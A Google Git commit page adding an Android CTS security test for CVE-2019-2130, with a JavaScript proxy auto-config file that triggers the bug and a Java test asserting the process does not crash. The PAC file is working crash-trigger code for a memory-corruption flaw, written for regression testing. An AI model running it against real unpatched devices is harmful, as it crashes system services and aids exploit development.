Google Git
Sign in
android / platform / cts / a1ad46d^! / .
commita1ad46d95852bfa8e2ac8930813424e4d9a26cba[log] [tgz]
authorJianping Yu <jianpingy@google.com>Mon Jul 29 15:48:57 2019 -0700
committerJianping Yu <jianpingy@google.com>Wed Aug 14 22:13:37 2019 +0000
tree16ee0d3d5b91b11863fea855476296c3079157fd
parent2316a89c1a3002c40ddcbdf3907f263351c3b185 [diff]
CTS test for Android Security CVE-2019-2130

Test: cts-tradefed run cts -m CtsSecurityBulletinHostTestCases -t
android.security.cts.Poc19_08#testPocCVE_2019-2130
Bug: 135207509
Bug: 132073833

Change-Id: I1b130e8766436fa58b54196d9895a9e28af3c143

diff --git a/hostsidetests/securitybulletin/res/CVE-2019-2130.pac b/hostsidetests/securitybulletin/res/CVE-2019-2130.pac
new file mode 100644
index 0000000..79d1967
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/CVE-2019-2130.pac

@@ -0,0 +1,21 @@
+function FindProxyForURL(url, host){
+    function opt() {
+        opt['x'] = 1.1;
+        try {
+            Object.create(object);
+        } catch (e) {
+        }
+
+        for (let i = 0; i < 100000; i++) {
+
+        }
+    }
+
+    opt();
+    object = opt;
+    opt();
+
+    return "DIRECT";
+}
+
+var object;
\ No newline at end of file

diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_08.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_08.java
new file mode 100644
index 0000000..b7fd2f2
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_08.java

@@ -0,0 +1,32 @@
+/**
+ * Copyright (C) 2019 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc19_08 extends SecurityTestCase {
+
+    /**
+     * b/129556445
+     */
+    @SecurityTest(minPatchLevel = "2019-08")
+    public void testPocCVE_2019_2130() throws Exception {
+        int code = AdbUtils.runProxyAutoConfig("CVE-2019-2130", getDevice());
+        assertTrue(code != 139); // 128 + signal 11
+    }
+}